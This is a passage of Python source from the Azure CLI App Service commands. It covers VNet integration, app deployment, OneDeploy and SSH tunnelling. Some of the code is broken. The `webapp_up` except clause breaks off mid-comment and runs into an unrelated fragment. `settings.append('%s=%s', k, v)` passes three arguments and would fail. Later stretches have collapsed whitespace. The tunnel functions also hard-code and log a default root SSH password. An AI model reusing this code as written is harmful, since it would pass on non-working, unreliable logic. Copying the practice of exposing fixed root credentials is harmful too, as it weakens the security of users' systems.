    if key == "empty":
        logger.warning("Key type is invalid - must be primary or secondary")
        return
    apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
                                                                           namespace,
                                                                           hybrid_connection)
    # changes the key for every app that uses that hybrid connection
    for x in apps:
        app_info = ast.literal_eval(x)
        app_name = app_info["name"]
        app_id = app_info["id"]
        id_split = app_id.split("/")
        app_resource_group = id_split[4]
        hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
                              relay_arm_uri=arm_uri, hostname=hostname, port=port,
                              send_key_name="defaultSender", send_key_value=key)
        web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
                                                     hybrid_connection, hc)
    return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
                                                                           namespace,
                                                                           hybrid_connection)


def appservice_list_vnet(cmd, resource_group_name, plan):
    """List the VNets connected to an App Service plan."""
    web_client = web_client_factory(cmd.cli_ctx)
    return web_client.app_service_plans.list_vnets(resource_group_name, plan)


def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
    """Remove a hybrid connection from the app (no-op with a warning on Linux apps)."""
    linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
    is_linux = linux_webapp.reserved
    if is_linux:
        # logger.warning returns None, so this early-returns None after warning
        return logger.warning("hybrid connections not supported on a linux app.")
    client = web_client_factory(cmd.cli_ctx)
    if slot is None:
        return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace,
                                                             hybrid_connection)
    else:
        return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name,
                                                                  namespace, hybrid_connection,
                                                                  slot)
    return return_hc


def list_vnet_integration(cmd, name, resource_group_name, slot=None):
    """List the app's VNet integrations, reformatted to a pruned dict shape."""
    client = web_client_factory(cmd.cli_ctx)
    if slot is None:
        result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
    else:
        result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
    mod_list = []
    # reformats the vnet entry, removing unnecessary information
    for x in result:
        # removes GUIDs from name and id
        longName = x.name
        if '_' in longName:
            usIndex = longName.index('_')
            shortName = longName[usIndex + 1:]
        else:
            shortName = longName
        v_id = x.id
        lastSlash = v_id.rindex('/')
        shortId = v_id[:lastSlash] + '/' + shortName
        # extracts desired fields
        certThumbprint = x.cert_thumbprint
        location = x.additional_properties["location"]
        v_type = x.type
        vnet_resource_id = x.vnet_resource_id
        id_strings = v_id.split('/')
        resourceGroup = id_strings[4]
        routes = x.routes
        vnet_mod = {"certThumbprint": certThumbprint,
                    "id": shortId,
                    "location": location,
                    "name": shortName,
                    "resourceGroup": resourceGroup,
                    "routes": routes,
                    "type": v_type,
                    "vnetResourceId": vnet_resource_id}
        mod_list.append(vnet_mod)
    return mod_list


def add_webapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None,
                                skip_delegation_check=False):
    """Add regional VNet integration to a webapp (thin wrapper over _add_vnet_integration)."""
    return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot,
                                 skip_delegation_check, True)


def add_functionapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None,
                                     skip_delegation_check=False):
    """Add regional VNet integration to a function app (thin wrapper over _add_vnet_integration)."""
    return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot,
                                 skip_delegation_check, False)


# NOTE(review): the definition below continues past the end of this chunk; it is reproduced
# unchanged up to the cut point.
def _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None,
                          skip_delegation_check=False, is_webapp=True):
    from azure.mgmt.web.models import SitePatchResource
    subnet_info = _get_subnet_info(cmd=cmd, resource_group_name=resource_group_name, subnet=subnet,
                                   vnet=vnet)
    client = web_client_factory(cmd.cli_ctx)
    if is_webapp:
        app = show_webapp(cmd, resource_group_name, name, slot)
    else:
        app = show_functionapp(cmd,
resource_group_name, name, slot) parsed_plan = parse_resource_id(app.app_service_plan_id) plan_info = client.app_service_plans.get(parsed_plan['resource_group'], parsed_plan["name"]) _validate_vnet_integration_location(cmd=cmd, webapp_location=plan_info.location, subnet_resource_group=subnet_info["resource_group_name"], vnet_name=subnet_info["vnet_name"]) if skip_delegation_check: logger.warning('Skipping delegation check. Ensure that subnet is delegated to Microsoft.Web/serverFarms.' ' Missing delegation can cause "Bad Request" error.') else: _vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"], vnet_resource_group=subnet_info["resource_group_name"], vnet_name=subnet_info["vnet_name"], subnet_name=subnet_info["subnet_name"]) subnet_id = subnet_info["subnet_resource_id"] if not slot: client.web_apps.update(resource_group_name=resource_group_name, name=name, site_envelope=SitePatchResource(virtual_network_subnet_id=subnet_id)) else: client.web_apps.update_slot(resource_group_name=resource_group_name, name=name, slot=slot, site_envelope=SitePatchResource(virtual_network_subnet_id=subnet_id)) # Enable Route All configuration config = get_site_configs(cmd, resource_group_name, name, slot) if config.vnet_route_all_enabled is not True: config = update_site_configs(cmd, resource_group_name, name, slot=slot, vnet_route_all_enabled='true') return { "id": subnet_info["vnet_resource_id"], "location": plan_info.location, # must be the same as vnet location bc of validation check "name": subnet_info["vnet_name"], "resourceGroup": subnet_info["resource_group_name"], "subnetResourceId": subnet_info["subnet_resource_id"] } def _vnet_delegation_check(cmd, subnet_subscription_id, vnet_resource_group, vnet_name, subnet_name): from azure.cli.core.commands.client_factory import get_subscription_id Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK) vnet_client = network_client_factory(cmd.cli_ctx) if 
       get_subscription_id(cmd.cli_ctx).lower() != subnet_subscription_id.lower():
        # cross-subscription subnet: we cannot inspect it, so warn with the manual fix
        logger.warning('Cannot validate subnet in other subscription for delegation to Microsoft.Web/serverFarms.'
                       ' Missing delegation can cause "Bad Request" error.')
        logger.warning('To manually add a delegation, use the command: az network vnet subnet update '
                       '--resource-group %s '
                       '--name %s '
                       '--vnet-name %s '
                       '--delegations Microsoft.Web/serverFarms', vnet_resource_group, subnet_name, vnet_name)
    else:
        subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet_name, subnet_name)
        delegations = subnetObj.delegations
        delegated = False
        for d in delegations:
            if d.service_name.lower() == "microsoft.web/serverfarms".lower():
                delegated = True

        if not delegated:
            subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
            vnet_client.subnets.begin_create_or_update(vnet_resource_group, vnet_name, subnet_name,
                                                       subnet_parameters=subnetObj)


def _validate_subnet(cli_ctx, subnet, vnet, resource_group_name):
    """Resolve user-supplied subnet/vnet (names or ARM ids) to a subnet resource id."""
    subnet_is_id = is_valid_resource_id(subnet)

    if subnet_is_id:
        subnet_id_parts = parse_resource_id(subnet)
        vnet_name = subnet_id_parts['name']
        if not (vnet_name.lower() == vnet.lower() or subnet.startswith(vnet)):
            logger.warning('Subnet ID is valid. Ignoring vNet input.')
        return subnet

    vnet_is_id = is_valid_resource_id(vnet)
    if vnet_is_id:
        vnet_id_parts = parse_resource_id(vnet)
        return resource_id(
            subscription=vnet_id_parts['subscription'],
            resource_group=vnet_id_parts['resource_group'],
            namespace='Microsoft.Network',
            type='virtualNetworks',
            name=vnet_id_parts['name'],
            child_type_1='subnets',
            child_name_1=subnet)

    # Reuse logic from existing command to stay backwards compatible
    vnet_client = network_client_factory(cli_ctx)
    list_all_vnets = vnet_client.virtual_networks.list_all()

    vnets = []
    for v in list_all_vnets:
        if vnet in (v.name, v.id):
            vnet_details = parse_resource_id(v.id)
            vnet_resource_group = vnet_details['resource_group']
            vnets.append((v.id, v.name, vnet_resource_group))

    if not vnets:
        # logger.warning returns None: caller receives no subnet id
        return logger.warning("The virtual network %s was not found in the subscription.", vnet)

    # If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
    found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
    if not found_vnet:
        found_vnet = [vnets[0]]
    (vnet_id, vnet, vnet_resource_group) = found_vnet[0]
    if len(vnets) > 1:
        logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
                       "To use a different virtual network, specify the virtual network resource ID using --vnet.",
                       vnet, vnet_id)
    vnet_id_parts = parse_resource_id(vnet_id)
    return resource_id(
        subscription=vnet_id_parts['subscription'],
        resource_group=vnet_id_parts['resource_group'],
        namespace='Microsoft.Network',
        type='virtualNetworks',
        name=vnet_id_parts['name'],
        child_type_1='subnets',
        child_name_1=subnet)


def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
    """Remove the (swift) vnet integration from a webapp or slot."""
    client = web_client_factory(cmd.cli_ctx)
    if slot is None:
        return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
    else:
        return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
    return return_vnet


def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Return the run history of a triggered webjob (slot-aware)."""
    client = web_client_factory(cmd.cli_ctx)
    if slot:
        return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
    return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)


def webapp_up(cmd, name=None, resource_group_name=None, plan=None, location=None, sku=None,  # pylint: disable=too-many-statements,too-many-branches
              os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False,
              app_service_environment=None):
    """`az webapp up`: detect the app in cwd, create (or reuse) RG/plan/webapp, zip-deploy it."""
    if not name:
        name = generate_default_app_name(cmd)
    import os
    AppServicePlan = cmd.get_models('AppServicePlan')
    src_dir = os.getcwd()
    _src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
    client = web_client_factory(cmd.cli_ctx)
    user = get_profile_username()
    _create_new_rg = False
    _site_availability = get_site_availability(cmd, name)
    _create_new_app = _site_availability.name_available
    os_name = os_type if os_type else detect_os_form_src(src_dir, html)
    _is_linux = os_name.lower() == 'linux'

    if runtime and html:
        raise CLIError('Conflicting parameters: cannot have both --runtime and --html specified.')

    if runtime:
        helper =
        _StackRuntimeHelper(cmd, client, linux=_is_linux)
        runtime = helper.remove_delimiters(runtime)
        match = helper.resolve(runtime)
        if not match:
            if _is_linux:
                raise CLIError("Linux runtime '{}' is not supported."
                               " Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
            raise CLIError("Windows runtime '{}' is not supported."
                           " Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
        language = runtime.split('|')[0]
        version_used_create = '|'.join(runtime.split('|')[1:])
        detected_version = '-'
    else:
        # detect the version from the contents of the source directory
        _lang_details = get_lang_from_content(src_dir, html)
        language = _lang_details.get('language')
        _data = get_runtime_version_details(_lang_details.get('file_loc'), language)
        version_used_create = _data.get('to_create')
        detected_version = _data.get('detected')

    runtime_version = "{}|{}".format(language, version_used_create) if \
        version_used_create != "-" else version_used_create
    site_config = None
    if not _create_new_app:  # App exists, or App name unavailable
        if _site_availability.reason == 'Invalid':
            raise CLIError(_site_availability.message)
        # Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
        logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
        app_details = get_app_details(cmd, name)
        if app_details is None:
            raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
                           "is a part of the current subscription if updating an existing app. If creating "
                           "a new app, app names must be globally unique. Please try a more unique name or "
                           "leave unspecified to receive a randomly generated name.".format(name))
        current_rg = app_details.resource_group
        if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
            raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
                           "match the value entered '{}'. Please re-run command with the "
                           "correct parameters.". format(name, current_rg, resource_group_name))
        rg_name = resource_group_name or current_rg
        if location is None:
            loc = app_details.location.replace(" ", "").lower()
        else:
            loc = location.replace(" ", "").lower()
        plan_details = parse_resource_id(app_details.server_farm_id)
        current_plan = plan_details['name']
        if plan is not None and current_plan.lower() != plan.lower():
            raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
                           "Please check if you have configured defaults for plan name and re-run command."
                           .format(plan, current_plan))
        plan = plan or plan_details['name']
        plan_info = client.app_service_plans.get(plan_details['resource_group'], plan)
        sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
        current_os = 'Linux' if plan_info.reserved else 'Windows'
        # Raise error if current OS of the app is different from the current one
        if current_os.lower() != os_name.lower():
            raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
                           "'{}'. Please create a new app "
                           "to continue this operation. For more information on default behaviors, "
                           "see https://docs.microsoft.com/cli/azure/webapp?view=azure-cli-latest#az_webapp_up."
                           .format(name, current_os, src_dir, os_name))
        _is_linux = plan_info.reserved
        # for an existing app check if the runtime version needs to be updated
        # Get site config to check the runtime version
        site_config = client.web_apps.get_configuration(rg_name, name)
    else:  # need to create new app, check if we need to use default RG or use user entered values
        logger.warning("The webapp '%s' doesn't exist", name)
        sku = get_sku_to_use(src_dir, html, sku, runtime)
        loc = set_location(cmd, sku, location)
        rg_name = get_rg_to_use(user, resource_group_name)
        _create_new_rg = not check_resource_group_exists(cmd, rg_name)
        plan = get_plan_to_use(cmd=cmd, user=user, loc=loc, sku=sku, create_rg=_create_new_rg,
                               resource_group_name=rg_name, plan=plan)
    dry_run_str = r""" {
            "name" : "%s",
            "appserviceplan" : "%s",
            "resourcegroup" : "%s",
            "sku": "%s",
            "os": "%s",
            "location" : "%s",
            "src_path" : "%s",
            "runtime_version_detected": "%s",
            "runtime_version": "%s"
            }
            """ % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped,
                   detected_version, runtime_version)
    create_json = json.loads(dry_run_str)

    if dryrun:
        logger.warning("Web app will be created with the below configuration,re-run command "
                       "without the --dryrun flag to create & deploy a new app")
        return create_json

    if _create_new_rg:
        logger.warning("Creating Resource group '%s' ...", rg_name)
        create_resource_group(cmd, rg_name, loc)
        logger.warning("Resource group creation complete")
    # create ASP
    logger.warning("Creating AppServicePlan '%s' ...", plan)
    # we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
    # updated we update those
    try:
        create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
                                number_of_workers=1 if _is_linux else None, location=loc,
                                app_service_environment=app_service_environment)
    except Exception as ex:  # pylint: disable=broad-except
        if ex.response.status_code == 409:  # catch 409 conflict when trying to
For node its site_config.app_settings, otherwise site_config if match: _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version) create_json['runtime_version'] = runtime_version # Zip contents & Deploy logger.warning("Creating zip with contents of dir %s ...", src_dir) # zip contents & deploy zip_file_path = zip_contents_from_dir(src_dir, language) enable_zip_deploy(cmd, rg_name, name, zip_file_path) if launch_browser: logger.warning("Launching app using default browser") view_in_browser(cmd, rg_name, name, None, logs) else: _url = _get_url(cmd, rg_name, name) logger.warning("You can launch the app at %s", _url) create_json.update({'URL': _url}) if logs: _configure_default_logging(cmd, rg_name, name) return get_streaming_log(cmd, rg_name, name) with ConfiguredDefaultSetter(cmd.cli_ctx.config, True): cmd.cli_ctx.config.set_value('defaults', 'group', rg_name) cmd.cli_ctx.config.set_value('defaults', 'sku', sku) cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan) cmd.cli_ctx.config.set_value('defaults', 'location', loc) cmd.cli_ctx.config.set_value('defaults', 'web', name) return create_json def _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version): update_needed = False if 'node' in runtime_version: settings = [] for k, v in match['configs'].items(): for app_setting in site_config.app_settings: if app_setting.name == k and app_setting.value != v: update_needed = True settings.append('%s=%s', k, v) if update_needed: logger.warning('Updating runtime version to %s', runtime_version) update_app_settings(cmd, rg_name, name, settings=settings, slot=None, slot_settings=None) else: for k, v in match['configs'].items(): if getattr(site_config, k, None) != v: update_needed = True setattr(site_config, k, v) if update_needed: logger.warning('Updating runtime version to %s', runtime_version) update_site_configs(cmd, rg_name, name, 
net_framework_version=site_config.net_framework_version, php_version=site_config.php_version, python_version=site_config.python_version, java_version=site_config.java_version, java_container=site_config.java_container, java_container_version=site_config.java_container_version) current_stack = get_current_stack_from_runtime(runtime_version) _update_webapp_current_stack_property_if_needed(cmd, rg_name, name, current_stack) if update_needed: logger.warning('Waiting for runtime version to propagate ...') time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this def _update_webapp_current_stack_property_if_needed(cmd, resource_group, name, current_stack): if not current_stack: return # portal uses this current_stack value to display correct runtime for windows webapps client = web_client_factory(cmd.cli_ctx) app_metadata = client.web_apps.list_metadata(resource_group, name) if 'CURRENT_STACK' not in app_metadata.properties or app_metadata.properties["CURRENT_STACK"] != current_stack: app_metadata.properties["CURRENT_STACK"] = current_stack client.web_apps.update_metadata(resource_group, name, metadata=app_metadata) def _ping_scm_site(cmd, resource_group, name, instance=None): from azure.cli.core.util import should_disable_connection_verify # wake up kudu, by making an SCM call import requests # work around until the timeout limits issue for linux is investigated & fixed user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name) scm_url = _get_scm_url(cmd, resource_group, name) import urllib3 authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password)) cookies = {} if instance is not None: cookies['ARRAffinity'] = instance requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(), cookies=cookies) def is_webapp_up(tunnel_server): return tunnel_server.is_webapp_up() def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, 
               instance=None):
    """Build (but do not start) a TunnelServer to a Linux webapp's SSH endpoint."""
    webapp = show_webapp(cmd, resource_group_name, name, slot)
    is_linux = webapp.reserved
    if not is_linux:
        raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")

    profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
    profile_user_name = next(p['userName'] for p in profiles)
    profile_user_password = next(p['userPWD'] for p in profiles)

    if port is None:
        port = 0  # Will auto-select a free port from 1024-65535
        logger.info('No port defined, creating on random free port')

    # Validate that we have a known instance (case-sensitive)
    if instance is not None:
        instances = list_instances(cmd, resource_group_name, name, slot=slot)
        instance_names = set(i.name for i in instances)
        if instance not in instance_names:
            if slot is not None:
                raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
            raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))

    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
    _ping_scm_site(cmd, resource_group_name, name, instance=instance)

    _wait_for_webapp(tunnel_server)
    return tunnel_server


def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
    """Open the tunnel on a daemon thread and block until timeout or the thread exits."""
    tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
    t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
    t.daemon = True
    t.start()
    logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
    config = get_site_configs(cmd, resource_group_name, name, slot)
    if config.remote_debugging_enabled:
        logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
    else:
        # default SSH credentials baked into the App Service Linux container image
        ssh_user_name = 'root'
        ssh_user_password = 'Docker!'
        logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)

    logger.warning('Ctrl + C to close')

    if timeout:
        time.sleep(int(timeout))
    else:
        while t.is_alive():
            time.sleep(5)


def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
    """Open the tunnel and attach an interactive SSH session over it."""
    tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
    t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
    t.daemon = True
    t.start()

    ssh_user_name = 'root'
    ssh_user_password = 'Docker!'

    s = threading.Thread(target=_start_ssh_session,
                         args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
    s.daemon = True
    s.start()

    if timeout:
        time.sleep(int(timeout))
    else:
        while s.is_alive() and t.is_alive():
            time.sleep(5)


def perform_onedeploy(cmd, resource_group_name, name, src_path=None, src_url=None, target_path=None,
                      artifact_type=None, is_async=None, restart=None, clean=None, ignore_stack=None,
                      timeout=None, slot=None):
    """`az webapp deploy`: package the CLI arguments and run the OneDeploy flow."""
    params = OneDeployParams()

    params.cmd = cmd
    params.resource_group_name = resource_group_name
    params.webapp_name = name
    params.src_path = src_path
    params.src_url = src_url
    params.target_path = target_path
    params.artifact_type = artifact_type
    params.is_async_deployment = is_async
    params.should_restart = restart
    params.is_clean_deployment = clean
    params.should_ignore_stack = ignore_stack
    params.timeout = timeout
    params.slot = slot

    return _perform_onedeploy_internal(params)


# Class for OneDeploy parameters
# pylint: disable=too-many-instance-attributes,too-few-public-methods
class OneDeployParams:
    def __init__(self):
        self.cmd = None
        self.resource_group_name = None
        self.webapp_name = None
        self.src_path = None
        self.src_url = None
        self.artifact_type = None
        self.is_async_deployment = None
        self.target_path = None
        self.should_restart = None
        self.is_clean_deployment = None
        self.should_ignore_stack = None
        self.timeout = None
        self.slot = None
# pylint: enable=too-many-instance-attributes,too-few-public-methods
def _build_onedeploy_url(params):
    """Compose the kudu /api/publish URL with the OneDeploy query parameters."""
    scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
    deploy_url = scm_url + '/api/publish?type=' + params.artifact_type

    if params.is_async_deployment is not None:
        deploy_url = deploy_url + '&async=' + str(params.is_async_deployment)

    if params.should_restart is not None:
        deploy_url = deploy_url + '&restart=' + str(params.should_restart)

    if params.is_clean_deployment is not None:
        deploy_url = deploy_url + '&clean=' + str(params.is_clean_deployment)

    if params.should_ignore_stack is not None:
        deploy_url = deploy_url + '&ignorestack=' + str(params.should_ignore_stack)

    if params.target_path is not None:
        deploy_url = deploy_url + '&path=' + params.target_path

    return deploy_url


def _get_onedeploy_status_url(params):
    """URL polled to track the latest deployment's progress."""
    scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
    return scm_url + '/api/deployments/latest'


def _get_basic_headers(params):
    """Basic-auth headers for the kudu call; content type depends on path vs URL source."""
    import urllib3

    user_name, password = _get_site_credential(params.cmd.cli_ctx, params.resource_group_name,
                                               params.webapp_name, params.slot)

    if params.src_path:
        content_type = 'application/octet-stream'
    elif params.src_url:
        content_type = 'application/json'
    else:
        raise CLIError('Unable to determine source location of the artifact being deployed')

    headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
    headers['Cache-Control'] = 'no-cache'
    headers['User-Agent'] = get_az_user_agent()
    headers['Content-Type'] = content_type

    return headers


def _get_onedeploy_request_body(params):
    """Request body: raw artifact bytes for a local path, JSON packageUri for a URL."""
    import os

    if params.src_path:
        logger.info('Deploying from local path: %s', params.src_path)
        try:
            with open(os.path.realpath(os.path.expanduser(params.src_path)), 'rb') as fs:
                body = fs.read()
        except Exception as e:  # pylint: disable=broad-except
            raise CLIError("Either '{}' is not a valid local file path or you do not have permissions to access it"
                           .format(params.src_path)) from e
    elif params.src_url:
        logger.info('Deploying from URL: %s', params.src_url)
        body = json.dumps({
            "packageUri": params.src_url
        })
    else:
        raise CLIError('Unable to determine source location of the artifact being deployed')

    return body


def _update_artifact_type(params):
    """Infer params.artifact_type from the source file extension when not given."""
    import ntpath

    if params.artifact_type is not None:
        return

    # Interpret deployment type from the file extension if the type parameter is not passed
    # NOTE(review): [1] raises IndexError for a file name with no extension — confirm
    # callers always pass an artifact file, or guard this.
    file_name = ntpath.basename(params.src_path)
    file_extension = file_name.split(".", 1)[1]
    if file_extension in ('war', 'jar', 'ear', 'zip'):
        params.artifact_type = file_extension
    elif file_extension in ('sh', 'bat'):
        params.artifact_type = 'startup'
    else:
        params.artifact_type = 'static'
    logger.warning("Deployment type: %s. To override deloyment type, please specify the --type parameter. "
                   "Possible values: war, jar, ear, zip, startup, script, static", params.artifact_type)


def _make_onedeploy_request(params):
    """POST the artifact to kudu and translate the HTTP status into CLI results/errors."""
    import requests
    from azure.cli.core.util import (
        should_disable_connection_verify,
    )

    # Build the request body, headers, API URL and status URL
    body = _get_onedeploy_request_body(params)
    headers = _get_basic_headers(params)
    deploy_url = _build_onedeploy_url(params)
    deployment_status_url = _get_onedeploy_status_url(params)

    logger.info("Deployment API: %s", deploy_url)
    response = requests.post(deploy_url, data=body, headers=headers, verify=not should_disable_connection_verify())

    # For debugging purposes only, you can change the async deployment into a sync deployment by polling the API status
    # For that, set poll_async_deployment_for_debugging=True
    poll_async_deployment_for_debugging = True

    # check the status of async deployment
    if response.status_code == 202 or response.status_code == 200:
        response_body = None
        if poll_async_deployment_for_debugging:
            logger.info('Polling the status of async deployment')
            response_body = _check_zip_deployment_status(params.cmd, params.resource_group_name, params.webapp_name,
                                                         deployment_status_url, headers, params.timeout)
            logger.info('Async deployment complete. Server response: %s', response_body)
        return response_body

    # API not available yet!
    if response.status_code == 404:
        raise CLIError("This API isn't available in this environment yet!")

    # check if there's an ongoing process
    if response.status_code == 409:
        raise CLIError("Another deployment is in progress. Please wait until that process is complete before "
                       "starting a new deployment. You can track the ongoing deployment at {}"
                       .format(deployment_status_url))

    # check if an error occurred during deployment
    # NOTE(review): status_code is always truthy here, so any status other than the
    # ones handled above (200/202/404/409) falls through to this error — confirm
    # other 2xx/3xx codes are not expected from this endpoint.
    if response.status_code:
        raise CLIError("An error occured during deployment. Status Code: {}, Details: {}"
                       .format(response.status_code, response.text))


# OneDeploy
def _perform_onedeploy_internal(params):
    """Drive a OneDeploy: infer the artifact type, then make the API call."""
    # Update artifact type, if required
    _update_artifact_type(params)

    # Now make the OneDeploy API call
    logger.info("Initiating deployment")
    response = _make_onedeploy_request(params)
    logger.info("Deployment has completed successfully")
    return response


def _wait_for_webapp(tunnel_server):
    """Poll once per second (up to ~60s) until the webapp answers the tunnel probe."""
    tries = 0
    while True:
        if is_webapp_up(tunnel_server):
            break
        if tries == 0:
            logger.warning('Connection is not ready yet, please wait')
        if tries == 60:
            raise CLIError('SSH timeout, your app must be running before'
                           ' it can accept SSH connections. '
                           'Use `az webapp log tail` to review the app startup logs.')
        tries = tries + 1
        logger.warning('.')
        time.sleep(1)


def _start_tunnel(tunnel_server):
    """Thread target: run the tunnel server's accept loop."""
    tunnel_server.start_server()


def _start_ssh_session(hostname, port, username, password):
    """Thread target: retry an SSH connection (up to ~60s), then run a login shell."""
    tries = 0
    while True:
        try:
            c = Connection(host=hostname,
                           port=port,
                           user=username,
                           # connect_timeout=60*10,
                           connect_kwargs={"password": password})
            break
        except Exception as ex:  # pylint: disable=broad-except
            logger.info(ex)
            if tries == 0:
                logger.warning('Connection is not ready yet, please wait')
            if tries == 60:
                raise CLIError("Timeout Error, Unable to establish a connection")
            tries = tries + 1
            logger.warning('.')
            time.sleep(1)
    try:
        try:
            c.run('cat /etc/motd', pty=True)
        except invoke.exceptions.UnexpectedExit:
            # Don't crash over a non-existing /etc/motd.
            pass
        c.run('source /etc/profile; exec $SHELL -l', pty=True)
    except Exception as ex:  # pylint: disable=broad-except
        logger.info(ex)
    finally:
        c.close()


def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):  # pylint: disable=too-many-statements
    """`az webapp ssh`: browser-based web SSH on Windows clients, tunneled SSH elsewhere."""
    import platform
    if platform.system() == "Windows":
        webapp = show_webapp(cmd, resource_group_name, name, slot)
        is_linux = webapp.reserved
        if not is_linux:
            raise ValidationError("Only Linux App Service Plans supported, found a Windows App Service Plan")

        scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
        if not instance:
            open_page_in_browser(scm_url + '/webssh/host')
        else:
            open_page_in_browser(scm_url + '/webssh/host?instance={}'.format(instance))
    else:
        config = get_site_configs(cmd, resource_group_name, name, slot)
        if config.remote_debugging_enabled:
            raise ValidationError('Remote debugging is enabled, please disable')
        create_tunnel_and_session(
            cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)


def _configure_default_logging(cmd, rg_name, name):
    """Enable filesystem application/web-server/container logging for the app."""
    logger.warning("Configuring default logging for the app, if not already enabled")
    return
config_diagnostics(cmd, rg_name, name, application_logging=True, web_server_logging='filesystem', docker_container_logging='true') def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name): ase_is_id = is_valid_resource_id(ase) if ase_is_id: return ase from azure.cli.core.commands.client_factory import get_subscription_id return resource_id( subscription=get_subscription_id(cli_ctx), resource_group=resource_group_name, namespace='Microsoft.Web', type='hostingEnvironments', name=ase) def _format_key_vault_id(cli_ctx, key_vault, resource_group_name): key_vault_is_id = is_valid_resource_id(key_vault) if key_vault_is_id: return key_vault from azure.cli.core.commands.client_factory import get_subscription_id return resource_id( subscription=get_subscription_id(cli_ctx), resource_group=resource_group_name, namespace='Microsoft.KeyVault', type='vaults', name=key_vault) def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None): hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_host_name_bindings', slot) verified_hostname_found = False for hostname_binding in hostname_bindings: binding_name = hostname_binding.name.split('/')[-1] if binding_name.lower() == hostname and (hostname_binding.host_name_type == 'Verified' or hostname_binding.host_name_type == 'Managed'): verified_hostname_found = True return verified_hostname_found def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None): # pylint: disable=protected-access key_info = KeyInfo(name=key_name, value=key_value) KeyInfo._attribute_map = { 'name': {'key': 'properties.name', 'type': 'str'}, 'value': {'key': 'properties.value', 'type': 'str'}, } client = web_client_factory(cmd.cli_ctx) if slot: return client.web_apps.create_or_update_host_secret_slot(resource_group_name, name, key_type, key_name, slot, key=key_info) return client.web_apps.create_or_update_host_secret(resource_group_name, name, 
